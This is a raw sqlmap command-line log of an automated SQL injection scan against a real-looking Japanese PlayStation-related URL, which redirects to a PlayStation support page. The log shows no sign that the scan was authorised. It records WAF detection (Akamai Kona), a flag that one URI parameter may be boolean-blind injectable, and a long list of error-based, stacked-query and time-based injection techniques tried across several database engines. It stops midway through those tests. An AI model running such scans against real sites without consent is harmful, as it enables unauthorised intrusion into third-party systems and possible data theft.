http://pscom.jp/info/psnqa/dl
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.5.151#dev}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:45:39 /2019-06-19/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[08:45:39] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[08:45:40] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'https://support.asia.playstation.com/jajp/s/article/ans-jajp50142'. Do you want to follow? [Y/n] Y
[08:45:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[08:45:43] [INFO] testing if the target URL content is stable
[08:45:45] [WARNING] URI parameter '#1*' does not appear to be dynamic
[08:45:46] [INFO] heuristics detected web page charset 'ascii'
[08:45:46] [CRITICAL] WAF/IPS identified as 'Kona Site Defender (Akamai Technologies)'
[08:45:46] [WARNING] potential permission problems detected ('Access Denied')
[08:45:46] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[08:45:46] [INFO] testing for SQL injection on URI parameter '#1*'
[08:45:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:46:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[08:46:16] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable 
[08:46:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[08:46:22] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:46:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[08:46:22] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[08:46:22] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[08:46:23] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[08:46:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[08:46:23] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[08:46:23] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[08:46:24] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[08:46:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[08:46:24] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[08:46:24] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[08:46:24] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[08:46:25] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[08:46:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:46:25] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[08:46:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[08:46:25] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[08:46:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[08:46:26] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)'
[08:46:26] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[08:46:26] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)'
[08:46:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:46:27] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[08:46:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[08:46:27] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[08:46:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[08:46:28] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[08:46:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[08:46:28] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[08:46:28] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[08:46:29] [INFO] testing 'Firebird OR error-based - WHERE or HAVING clause'
[08:46:29] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[08:46:29] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[08:46:29] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[08:46:29] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[08:46:29] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[08:46:29] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[08:46:29] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[08:46:29] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[08:46:29] [INFO] testing 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[08:46:29] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[08:46:29] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[08:46:29] [INFO] testing 'Oracle error-based - Parameter replace'
[08:46:29] [INFO] testing 'Firebird error-based - Parameter replace'
[08:46:29] [INFO] testing 'MySQL inline queries'
[08:46:30] [INFO] testing 'PostgreSQL inline queries'
[08:46:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[08:46:30] [INFO] testing 'Oracle inline queries'
[08:46:30] [INFO] testing 'SQLite inline queries'
[08:46:31] [INFO] testing 'Firebird inline queries'
[08:46:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[08:46:32] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:46:32] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[08:46:32] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[08:46:32] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[08:46:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[08:46:33] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[08:46:33] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[08:46:33] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'
[08:46:33] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[08:46:34] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'
[08:46:34] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[08:46:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[08:46:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[08:46:34] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[08:46:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[08:46:35] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[08:46:35] [INFO] testing 'Oracle stacked queries (heavy query)'
[08:46:35] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)'
[08:46:36] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
[08:46:36] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP - comment)'
[08:46:36] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)'
[08:46:36] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'
[08:46:36] [INFO] testing 'IBM DB2 stacked queries (heavy query)'
[08:46:36] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[08:46:36] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[08:46:37] [INFO] testing 'Firebird stacked queries (heavy query - comment)'
[08:46:37] [INFO] testing 'Firebird stacked queries (heavy query)'
[08:46:37] [INFO] testing 'SAP MaxDB stacked queries (heavy query - comment)'
[08:46:37] [INFO] testing 'SAP MaxDB stacked queries (heavy query)'
[08:46:38] [INFO] testing 'HSQLDB >= 1.7.2 stacked queries (heavy query - comment)'
[08:46:38] [INFO] testing 'HSQLDB >= 1.7.2 stacked queries (heavy query)'
[08:46:38] [INFO] testing 'HSQLDB >= 2.0 stacked queries (heavy query - comment)'
[08:46:38] [INFO] testing 'HSQLDB >= 2.0 stacked queries (heavy query)'
[08:46:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:46:39] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[08:46:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[08:46:39] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[08:46:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[08:46:40] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[08:46:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[08:46:40] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[08:46:40] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[08:46:40] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[08:46:41] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[08:46:41] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[08:46:41] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[08:46:41] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[08:46:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[08:46:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[08:46:42] [INFO] testing 'MySQL AND time-based blind (ELT)'
[08:46:42] [INFO] testing 'MySQL OR time-based blind (ELT)'
[08:46:42] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[08:46:43] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
